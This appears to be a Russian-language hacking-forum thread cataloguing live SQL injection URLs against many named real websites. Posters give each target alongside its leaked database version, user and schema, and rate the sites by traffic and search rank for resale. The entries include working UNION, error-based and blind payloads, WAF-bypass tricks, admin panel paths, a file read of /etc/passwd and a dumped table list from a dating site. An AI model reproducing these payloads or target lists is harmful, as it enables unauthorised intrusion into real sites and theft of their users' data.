casuni@184.168.152.78 (mailto:casuni@184.168.152.78)

casuni

Powered By: Friends IT Solution (дырявые все)

Пробую их самих разобрать.

The NORTH FACE


Code:
http://north-face.com.ua/search/?searh=%27and%28select*from%28select%28name_const% 28version%28%29,1%29%29,name_const%28version%28%29 ,1%29%29a%29and%27

Версия: 5.5.42-37.1

www.nowinstock.net (http://www.nowinstock.net) трафф 580к


Code:
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 RLIKE (SELECT (CASE WHEN (2936=2936) THEN 1 ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.nowinstock.net:80/view_cache.php?lid=1 AND EXTRACTVALUE(4360,CONCAT(0x5c,0x71786a6a71,(SELECT (ELT(4360=4360,1))),0x71626a7071))
---
web application technology: Apache
back-end DBMS: MySQL 5.1
База sdfs4f_main

Code:
http://www.pourmaplanete.com/news/novel.php?ID=-151+UNION SELECT 1,user(),version(),4,5,6,7,8,9,10,database(),12,13--
http://www.tovary2.ru/a-general.php?id_gorod=-74+UNION SELECT 1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,1 6,17,database(),19,20,21,22,23,24,25,26,27,28--
http://velostar.ru/guest.php?active_page=-1500+union+select+1,2,3,4,5,version(),7,8--
Вывод в title

papersource.com трафф 430к


Code:
Parameter: #1* (URI)

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' RLIKE (SELECT (CASE WHEN (4297=4297) THEN 1 ELSE 0x28 END)) AND 'DiTO'='DiTO.html

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: http://www.papersource.com:80/personalized/wedding-save-the-dates/digital-1photo--photo-save-the-dates/1' AND EXTRACTVALUE(1565,CONCAT(0x5c,0x71626a6b71,(SELECT (ELT(1565=1565,1))),0x716a787871)) AND 'DncI'='DncI.html

back-end DBMS: MySQL >= 5.0.0

databases:

paper

Code:
http://testmat.ru/mat_test.php?id=-2+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2+from+users+--+



Code:
http://www.yarohranatruda.ru/order.php?id=-377%27+union+select+1,admin_name,admin_passwd,4,5+ FrOm+admin+--+

Админка


Code:
http://www.yarohranatruda.ru/admin/



Code:
http://russkayabronza.com/1/order.php?id=-866'+union+select+1,2,3,4,5,6,7,8,9+--+

Админка


Code:
http://russkayabronza.com/adm.php

Code:
http://koreamed.org/JournalVolume.php?id=-200+union+select+user%28%29--

использовал вкупе с sqlmap

information_schema

KoreaMed

test

Адовое количество таблиц, возиться не стал.


Code:
http://www.findfilehost.com/filehost.php?id=-2+UNION%20+select%20+%20%201,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21--

режет mod_secure


Code:
http://www.jamrid.com/RiddimDetail.php?ID=-1677+union+select+1,convert%28concat_ws%280x3a3a,v ersion%28%29,user%28%29,database%28%29%29+using+la tin1%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Проблема с кодировкой, неверно выводит и просто вывести version() нельзя. Нужно воспользоваться фукцией convert()

convert(version()+using+latin1)

в итоге есть:

4.1.14::soundman@localhost::RiddimDB

Code:
http://toefilm.ru/view_post.php?id=-32%27+union+select+1,2,3,4,5,6,7,8,9,10,@@version, 12,13,14,15+--+

Аэропорт, вроде не самый маленький в этих ваших Европах. Присутствует фильтр обходится внедрением в любую часть %0B, например union -> uni%0Bin, information_schema.tables -> infor%0Bmation_schema.tables и далее по аналогии.

Тиц == 110, PR == 6, Alexa == 120,422


Code:
http://www.koeln-bonn-airport.de/index.php?id=147&L=0&q=1'or(extractvalue(rand(),concat(0x3a,(Sel%0BeCt( concat_ws(0x3a,version(),user()))))))='1

Онлайн бронь на авиабилеты и все что с этим связано. Вывод в сорсе

Тиц == 10, PR == 0, Alexa == 390,710


Code:
http://www.parkrideflyusa.com/booking-details?id=-31 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x03a,v ersion(),database(),user())--

общего трафика много вроде , 2,7kk, субдомен pmi.org


Code:
http://learning.pmi.org/course-detail.php?id=-3582+union+select+all+1,concat(user(),0x3a,databas e(),0x3c62723e,version()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37+limit+0,1--

pmiprof@184.168.193.187 (mailto:pmiprof@184.168.193.187): pmiprof

5.0.96-log

игры для консолей


Code:
https://www.playonrent.com/gameDetails.php?id=137 and (select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Duplicate entry 'A883245_sidhant@173.83.247.2321' for key 'group_key'

5.1.69-community-log

WAF


Code:
http://www.e-wigs.com/wigs.php?id=-1773 UNION SELECT 1,2,3,4,5,concat(user(),0x3a,database(),0x3c62723e ,version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27 limit 0,1

Вот обоход


Code:
http://www.e-wigs.com/wigs.php?id=-1773/*!union*//*!12345%73%65%6c%65%63%74*/1,2,3,4,5,concat%28user%28%29%2C0x3a%2Cdatabase%28 %29%2C0x3c62723e%2Cversion%28%29%29,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where TABLE_schema=database%28%29 limit 0,1

dbo472536571@74.208.16.148: (mailto:dbo472536571@74.208.16.148:)db472536571

5.1.73-log


Code:
http://www.fckhimki.ru/modules/players/index_d.php?current_id=15&player_id=-111+union+select+1,2,3,4,version(),6,7,8,9,10 --

5.0.90-log

Code:
http://www.season.ru/forum/profile.php?f=5&id=-1556%27+union+select+1,2,3,4,5,6,7,8,version%28%29 ,10,11,12,13,14--+

Code:
https://www.htw-dresden.de/index.php?id=9147&vid=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21+--+

Была разминка, думал что сойдет для продажи но мелочи думаю... может кому полезно будет или трафферам.


Code:
ttp://torrent.tlt.ru/browse.php?cat=5
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Nginx
back-end DBMS: MySQL 5.0
available databases [2]:
information_schema
tracker



Code:
mega-torrent.ru/browse.php?cat=18
Warning: mysql_fetch_array() expects parameter 1 to be resource



Code:
http://www.guildvalhall.eu/inc-news.php?id=8429
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
information_schema
valhall

Инфы много.)

Code:
http://xn--h1acbqf.xn--e1apq.xn--p1ai/view_dokum.php?id=-37%27+union+select+1,@@version,3,4,5,6,7,8,9,10+--+

Зарубежный сайт знакомств


Code:
http://staynaughty.com/wall.php?uid=442%20and%20(select+1+from(select+cou nt(*),concat(version(),floor(rand(0)*2))x+from+inf ormation_schema.tables+group+by+x)a)

Сайт анонимных знакомств и раврата...


Code:
https://sexintime.at/wall.php?uid=101899%20%20and%20(select+1+from(sele ct+count(*),concat(version(),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)

Вывод в заголовке, или в сорсе


Code:
http://www.uaces.org/events/calendar/event.php?id=1 /*!50000UnION*/ SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23 --

5.5.42-cll

Спортивное снаряжение Twins

Вывод в заголовке, или в сорсе


Code:
http://www.twinsspecial.com/product-detail.php?id=-70' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,version(),26,27,28,29 or ''='

twinsspe_twins@localhost

5.5.36-cll

twinsspe_twins

Шоп


Code:
http://www.patersonphotographic.com/category.php?categoryID=1 and extractvalue(null,concat(0x3a,(select concat_ws(0x3c62723e,user(),version()))))

plummo@localhost

5.1.73

plummo_shop


Code:
http://www.dfki.de/lt/card.php?id=-185 and 1=1 UNION SELECT 1,user(),version(),database(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30 --

staff_user@lnv-101

4.0.21-Max

staff


Code:
http://www.ghasham.com/products-category.php?id=-6 /*!50000and 1=1*/ /*!50000uNIoN*/%09/*!50000seLEC%74*/%091,2,/*!50000unhex(hex(coNcat_ws(0x3a,user(),version(),d atabase())))*/,4,5,6,7,8,9,10,11,12,13 --

ghashamo_user@localhost

5.5.42-37.1

ghashamo_db

Шоп


Code:
http://www.mcfarlandbooks.com/book-2.php?id=-978-0-7864-7807-1'+/*!50000UnIoN*/+all+/*!50000SeLeCt*/+1,2,/*!50000coNcat_ws(0x3c62723e,user(),version(),datab ase())*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 +--+and '1'='1

mcbooks_dbuser@localhost

5.5.42-37.1

mcbooks_mainsite

Code:
http://www.industrie4-summit.de/soap/showProgramDetails.php?eventId=45&language=de&opener=/programm.html&id=27121+union+select+1,2,3,4,5,6,7,8,9,version(), 11,12+from+information_schema.tables+--+

5.5.44-0+deb7u1-log

Code:
http://www.ugon.kz/index.php?option=com_ncatalogues&controller=ajax&task=multiselect&id=28%20UNION%20ALL%20SELECT%20NULL,version%28%29, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL--%20&JsHttpRequest=14458949481000-xml

5.5.44-cll-lve

Code:
http://bol24.ru/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1

http://casino-e.org/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
(http://casino-e.org/'+union+select+1,2,3,4,5,6,7,8,9+--+)

Code:
http://frisbee-pay.ru/client/'or(ExtractValue(1,concat(0x3a,(select(user()))))) ='1

Code:
http://www.iqpartner.info/ru/?CATALOG=hosting_tariff%27or(ExtractValue(1,concat (0x3a,(select(user())))))=%271



Code:
http://platforma.ru/'or(ExtractValue(1,concat(0x3a,(select(user()))))) ='1

Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 210 - Google Page Rank 3/10

Яндекс Каталог Да-DMOZ.org каталогДа



Code:
http://www.soate.ru/news/new.php?id=-54+union+select+version(),2,3,4,5+--+




Версия:5.5.44-1+wheezy1+mh1-log

Code:
http://www.allomebel.ru/shop/?dir=-9%20union%20select%201,2,3,4,5,version%28%29,7,8,9 %20--

5.5.30-log

ЯК, тиц 70


Code:
http://www.fortland.ru/index.html?action=catalog&id=-6%20union%20select%201,2,3,4,5,6,version%28%29,8,9 ,10,11

5.5.46-cll

ЯК, ТИЦ 200

Code:
http://www.rinekekop.nl/get_item.php?id=33'/*!50000UNION*//*!50000SELECT*/1,2,version(),user(),5-- -

5.5.42-cll-lve

ijsvogel@localhost

Яндекс Тиц http://pr-cy.ru/static/img/yandex-bar/bar4.gif 230 - Google Page Rank 3/10

Яндекс Каталог Да - DMOZ.org каталог Нет


Code:
http://basket.ugmk.com/ru/news/index.php?id15=-10394+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18+--+

Code:
http://inet.pushkino-telecom.ru/index.php?id=qiwi-pay%27or(ExtractValue(1,concat(0x3a,(select(user() )))))=%271

Траф 50к

Pr 5


Code:
http://astroscope.ru/blog/rate.php?id=-2842'+or+1+group+by+concat(0x7c,(select+mid((ifnul l(cast(schema_name+as+char),0x20)),1,54)+from+info rmation_schema.schemata+limit+1,1),0x7c,floor(rand (0)*2))+having+min(0)%23

Code:
http://wmfast.com/news.php?id=-10%27+union+select+1,2,3,4+--+

Трафик 85к

Тиц 800

PR 5


Code:
http://novostimira.com/videonews.php?act=view&id=1' and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 1,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

Трафик 100к

Тиц 1600

Pr 7

File_priv=Y


Code:
http://pogoda.by/climat-directory/index.php?year=1'+union+all+select+concat(0x7e,0x2 7,load_file('/etc/passwd'),0x27,0x7e),1,1,1--+

ServerName pogoda.by

/var/www/html

ServerName pda.pogoda.by

/var/www/html/pda

ServerName meteoinfo.by

/var/www/www.meteoinfo.by (http://www.meteoinfo.by)

ServerName 6.pogoda.by

/var/www/html/six

THE OTHER WORLD KINGDOM 18+


HTML:
http://www.owk.cz/philosophy-operation/whoweare/subject.php?id=-9%20union%20select%201,version(),database(),user() ,5,6,7,8,9,10--+f

ТИЦ10

PR3

AR405,200

Visits 25K

5.1.73-1+deb6u1wk:OWK_shop@localhost

RU SHOP


Code:
http://thedespair.ru/product/0'+UnIon+selECt+1,@@version,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+--+

5.5.35-rel33.0-log

Code:
http://www.colinst.com/brief.php?id=51%20and%20(select%201%20from(select% 20count(*),concat(user(),floor(rand(0)*2))x%20from %20information_schema.tables%20group%20by%20x)a)

Duplicate entry 'root@localhost1' for key 1

Версия 5.0.671

Присутствует waf на union select

Тиц 60 PR 3


Code:
http://www.eastoftheweb.com/short-stories/index.php?p=web/author/GuydeMaupassant%27+union+select+@@version,2+--+

В помощь Милонову

gaycities.com 253к голубцов


Code:
h**p://www.gaycities.com/biz/account/biz_activate.php
POST:pwsubmit=Verify Email Address&c=0c425b5&code=94102&referrer=http://www.gaycities.com/biz/account/&un=1') RLIKE (SELECT (CASE WHEN (666=666) THEN 1 ELSE 0x28 END)) AND ('gayS'='gayS

MySQL 5.1.33

.SpoilerTarget" type="button">Spoiler: gaycities_prod
+----------------------------------------+

| metro_newslettes |

| abuse_reports |

| admin_contacts |

| admin_email_verifications_config |

| admin_email_verifications_lookup |

| answer_likes |

| answer_listings |

| answers |

| badges |

| bars_guestreviews |

| bizusers |

| bizusers_listings |

| bizusers_listings_updates |

| checkin_lookups |

| checkins |

| checkins_emails |

| checkins_medals |

| checkins_scores |

| comments |

| contact |

| contest_entries |

| cron_tbl_dates |

| editor_assigned |

| editors |

| enhanced_lis@ings |

| event_comments |

| events |

| events_relationships |

| events_tags |

| external_histing_foursquare_categories |

| facebook_beenthere |

| facebook_eveht_owners_approve |

| facebook_friends |

| facebook_going |

| facebook_pages |

| favorites |

| featured_items |

| foursquare_categories |

| friends |

| galleries |

| gallery_images |

| giveaways |

| iglta_hotels |

| iglta_hotels_incoming |

| iphone_beta_testers |

| iphone_logger |

| likes |

| list_items |

| listing_images |

| listing_likes |

| listing_prizes |

| listing_types |

| listing_updates |

| listings |

| listings_cleaned |

| listings_copy |

| listings_copy2 |

| listings_external |

| listings_tags |

| mail |

| metro_newsletter_events |

| metro_newsletter_subsbriptions |

| metros |

| metros_geonames |

| metros_urls |

| neighborhoods |

| nem_register |

| newsfeed_items |

| password_resetcodes |

| paypal_payment_info |

| pending_listing_reviews |

| pending_listings |

| peopletags |

| permissions |

| photocontest_images |

| photocontest_judges |

| photocontests |

| polls_content |

| polls_votes |

| press |

| programming_featpres |

| programming_mobile_broadcast |

| promo_locations |

| question_follows |

| questions |

| ratings |

| reviews |

| schema_updates |

| search_synonyms |

| setting_permissions |

| settings |

| tag_approved_hotels |

| tag_approved_hotels_incoming |

| tags |

| temp_49_entries |

| temp_checkins |

| temp_emails |

| temp_fb_event_owners |

| temp_locationusers |

| user_images |

| user_messages |

| user_settings |

| users |

| users_events |

| users_peopletags |

| users_socialnets |

| weekly_newsletters |

+----------------------------------------+

Code:
https://www.billykfitness.com/fitness/index.php/pay?pid=1%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELE CT%201%20UNION%20SELECT%202%20UNION%20SELECT%203)x %20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%2063),% 20FLOOR(RAND(0)*2)))%20--

5.1.731 for key

Тиц 325 Pr 3


Code:
http://www.ph4.ru/h_CITIES.php?d=2154+UnIon+selECt+1,2,3,4,5,6,7,8,9 ,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60+--+

5.5.44-37.3-log

Code:
http://www.pangea-tour.ru/cities.php?id=-201+union+select+1,database(),3,@@version,5,6,7,8, 9--&Spid=45

5.5.44-1+wheezy1+mh1-log

u21941_8

u21941

u21941_2

u21941_astra

u21941_tsls

East Coast Trail | Scenic and Unique Hiking and Walking Trails in Newfoundland and Labrador, Canada – Welcome to the East Coast


Code:
http://eastcoasttrail.ca/trail/view.php?id=3%20/*!50000union*/%20distinct%20select%20version(),2,3,4,5,6,7,8,9--+f

5.5.45-cll-lve

ТИЦ10

PR5

Code:
http://abendblatt.ergebnisdienst-fussball.de/index.php?liga=2511 (GET)
Parameter: liga (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: liga=2511 AND 1436=1436

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: liga=2511 AND (SELECT * FROM (SELECT(SLEEP(5)))oChU)
---
back-end DBMS: MySQL 5.0.12

Подкиньте жиров.

Code:
http://www.mondanionline.com/valutazione-officine_panerai_panerai_ref__6152/1-36.php?lingua=it%20OR%20(SELECT%20COUNT(*)%20FROM% 20(SELECT%201%20UNION%20SELECT%202%20UNION%20SELEC T%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,% 2063),%20FLOOR(RAND(0)*2)))%20--

5.6.25-log

После запроса, код остается в куках.


Code:
http://www.onionring.co.uk/article.asp?NID=411%20OR%20(SELECT%20COUNT(*)%20FR OM%20(SELECT%201%20UNION%20SELECT%202%20UNION%20SE LECT%203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%20 1,%2063),%20FLOOR(RAND(0)*2)))%20--

5.5.29-log


Code:
http://en.chinapanda.org.cn/topic.php?id=5%20OR%20(SELECT%20COUNT(*)%20FROM%20 (SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT% 203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%20 63),%20FLOOR(RAND(0)*2)))%20--

5.6.27


Code:
http://alicekwartler.com/product-info.php?id=-1750+UnIon+selECt+1,2,3,4,5,6,@@version,8,9,10,11, 12,13+--+

5.0.96-log

Code:
http://www.uralopera.ru/showperson.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12

5.5.46-MariaDB-1~wheezy-log 3

ТИЦ425


Code:
http://www.autoconsulting.ua/news.php?catid=-1 union all select version(),2,3,4,5,6,7,8 and '0'='0

autoconsulting@localhost

5.5.40-log

ТИЦ325 YC(R4) PR4


Code:
http://wciom.ru/index.php?id=236&uid=-1 union all select 1,2,3,4,5,6,version()--

5.5.38

ТИЦ4300 PR6


Code:
http://sipaero.ru/post.php?id=-1 union all select 1,user(),database(),version(),5,6,7,8,9

admin_sipaero@localhost admin_sipaero 5.1.73

Code:
http://www.affordablesound.com/productlist.php?id=version()



Code:
http://www.calais-shopping.com/fiche.php?id=9999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,ve rsion(),21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50

5.1.73-0ubuntu0.10.04.1-log в исходе


Code:
http://www.hotrodwelding.nl/product.php?id=9999.9' union all select 1,2,3,version(),5,6,7,8,9 and '0'='0

5.5.22-log


Code:
http://www.annam.com.hk/menu-causeway-bay.php?id=-6748' UNION ALL SELECT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL-- -

5.5.45-cll-lve

Code:
http://www.jiteli.info/altai?fio=%F6%FC%25%27+and+adress+LIKE+%27%25%27+u nion+select+version%28%29,version%28%29+limit+1+--+s&adress=&searchButton=+%CD%E0%E9%F2%E8+

5.5.47

Code:
http://www.casco.com.ru/index.php?contentID=741
---
Parameter: contentID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentID=741' AND 2149=2149 AND 'bXwR'='bXwR

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
Payload: contentID=741' OR (SELECT * FROM (SELECT(SLEEP(5)))qEJY) AND 'XZHa'
='XZHa
---
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: Apache 2.2.14
back-end DBMS: MySQL 5.0.12

.................................................. ..........................................


Code:
http://www.avongorge.org.uk/aboutus.php?ContentID=1'+and(select+1+from(select+ count(*),concat((select(select(select+concat(0x3d7 e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+i nformation_schema.tables+limit+0,1),floor(rand(0)* 2))x+from+information_schema.tables+group+by+x)a)+ and+'1'='1
5.0.87-b20



Code:
http://www.steelers.co.nz/steelers/index.php?contentid=9999.9+union+all+select+1,2,(s elect+1+from(select+count(*),concat((select(select (select+concat(0x3d7e3d,ifnull(version(),char(32)) ,0x3d7e3d)+))+from+information_schema.tables+limit +0,1),floor(rand(0)*2))x+from+information_schema.t ables+group+by+x)a),4,5,6,7,8,9,10
'=~=5.5.34-MariaDB-cll-lve=~=1'



Code:
http://www.lostroveroscriollos.com/video.php?contentID=-3859 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,version(),NULL,NULL ,NULL,NULL-- -

5.1.30



Code:
http://www.mkungl.com/2/d.php?contentID=(select+1+from(select+count(*),con cat((select(select(select+concat(0x3d7e3d,ifnull(v ersion(),char(32)),0x3d7e3d)+))+from+information_s chema.tables+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)

'=~=5.1.67-rel14.3=~=1'



Code:
http://waddleviolins.com/index.php?contentID=86' UNION ALL SELECT NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL-- -
5.1.73-cll



Code:
http://www.uisp.it/torino2/index.php?contentId=18+or+1=(select+1+from(select+ count(*),concat((select(select(select+concat(0x3d7 e3d,ifnull(version(),char(32)),0x3d7e3d)+))+from+i nformation_schema.tables+limit+0,1),floor(rand(0)* 2))x+from+information_schema.tables+group+by+x)a)+ and+1=1
PR5 AlexaRank 100,405



Code:
http://www.erpug.org/index.php?contentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,version(),12,13,14 and '0'='0
5.5.47-MariaDB-1~wheezy

Code:
www.fba-labs.com/index.php?contentid=1' union all select database(),version(),3,4 and '0'='0
fbalabs_admin@localhost fbalabs_cms 5.5.48-cll

http://www.strengholt.nl/musicgroup/content.php?menuid=27 or 1=-1 union all select version(),database()--
5.5.38-0ubuntu0.14.04.1 Strbv_strnl

http://www.dswbrand.com/flash_detail.php?id=-1 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19
5.1.73-log

http://iram-institute.org/EN/content-page.php?ContentID=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(), 18,19,20,version(),22,23,24,25,26,27,28,29,30 and '0'='0
5.0.45 webdb

http://www.areatattoo.com/flash_detail.php?id=-1' union all select 1,2,version(),4 and '0'='0

5.5.41

Code:
http://www.bestrent.fi/en/book-now.php?id=9999.9 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21
5.1.65

http://www.infantaria-paintball.com.br/loja/sessoes.asp?id=26'+and(select+1+from(select+count( *),concat((select(select(select+concat(0x3d7e3d,if null(version(),char(32)),0x3d7e3d)+))+from+informa tion_schema.tables+limit+0,1),floor(rand(0)*2))x+f rom+information_schema.tables+group+by+x)a)+and+'1 '='1
5.0.45-community-nt

http://www.badboysafloat.com.au/product_details.php?id=9999.9 union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16
10.0.20-MariaDB-cll-lve

http://www.attaapparels.com/shop.php?id=9999.9 union all select 1,2,3,version(),5,6,7,8,9,10,11,12
5.5.44-log

http://www.kabelindo.co.id/readnews.php?id=(select+1+from(select+count(*),con cat((select(select(select+concat(0x3d7e3d,ifnull(v ersion(),char(32)),0x3d7e3d)+))+from+information_s chema.tables+limit+0,1),floor(rand(0)*2))x+from+in formation_schema.tables+group+by+x)a)
10.1.13-MariaDB

Code:
_ttp://taxiforsazh.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+

5.1.71-cll-lve

Code:
http://relax-nk.ru/rub.php?id=1 union all select @@version,2
5.5.47

http://janno.net/shop_.php?id=-1 union all select 1,@@version,3,4,5,6
5.5.48-cll 3

http://www.flundra.com/shop2.php?id=-1 union all select 1,2,@@version,4,5,6,7,8
5.5.29-log

www.powermanager.co.kr/bbs/shop_.php?cno=2
---
Parameter: cno (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cno=2) AND 2160=2160 AND (1973=1973

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cno=2) AND (SELECT * FROM (SELECT(SLEEP(5)))doLu) AND (4537=4537
---
web application technology: PHP 5.3.13
back-end DBMS: MySQL 5.0.12
Database: powermgcok

http://www.suriyanar.com/pay.php?Id=-1 union all select 1,@@version,3,4,5
5.1.73-cll

http://www.vidspoke.com/buy.php?id=-1+union+all+select(select+concat(ifnull(version(), char(32)))+)
5.5.45-cll-lve

http://depolamp.ru/buy.php?id=-1 union all select 1,@@version,3,4,5,6,7,8,9
5.1.73

http://www.zeogames.net/game.php?id=6
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 7494=7494

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=6 AND (SELECT * FROM (SELECT(SLEEP(5)))CLTv)
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

Code:
http://www.slavsandtatars.com/about.php?id=-1 union all select version(),2,3
5.0.96-log

http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union all select 1,version(),3,4,5,6
10.1.13-MariaDB

http://www.nbrri.gov.ng/sites/news.php?ID=2
---
Parameter: ID (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: ID=2 RLIKE (SELECT (CASE WHEN (3724=3724) THEN 2 ELSE 0x28 END))

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
Payload: ID=2 AND EXTRACTVALUE(5424,CONCAT(0x5c,0x7162627871,(SELECT (ELT(54
24=5424,1))),0x716b707871))

Type: AND/OR time-based blind
Title: MySQL = 5.0.12 AND time-based blind (SELECT)
Payload: id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))PeRi) AND 'kKhu'='kKhu
---
back-end DBMS: MySQL 5.0.12

http://www.putridflowers.com/music.php?id=(select+1+from(select+count(*),concat ((select(select(select+concat(0x3d7e3d,ifnull(vers ion(),char(32)),0x3d7e3d)+))+from+information_sche ma.tables+limit+0,1),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)
5.5.43-37.2-log

Code:
http://www.component-asu.ru/catalog.php?tp=1' union all select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27-- -
5.5.34-32.0-log

================================================== ================================================== =============
https://www.fairradio.com/catalog.php?mode=view&categoryid=214
---
Parameter: categoryid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mode=view&categoryid=214') AND 9239=9239 AND ('bsAX'='bsAX

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: mode=view&categoryid=214') AND (SELECT * FROM (SELECT(SLEEP(5)))Ximv) AND ('zqOE'='zqOE
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
available databases [2]:
fairrad_radio
information_schema

================================================== ================================================== =============
http://www.dataapex.com/catalog.php?catCategory=1
---
Parameter: catCategory (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: catCategory=1 AND (SELECT * FROM (SELECT(SLEEP(5)))MTXx)
---
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: PHP 5.4.45, Apache 2.2.22
back-end DBMS: MySQL 5.0.12

================================================== ================================================== =============
http://dnepr-auto.dp.ua/catalog.php?id=1'+and(select+1+from(select+count(* ),concat((select(select(select+concat(0x3d7e3d,ifn ull(version(),char(32)),0x3d7e3d)+))+from+informat ion_schema.tables+limit+0,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)+and+'1' ='1
5.5.41-0+wheezy1
+ XSS

================================================== ================================================== =============
http://jewelfox.ru/catalog.php?catId=ard
---
Parameter: catId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: catId=ard' AND 5559=5559 AND 'QhzR'='QhzR

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
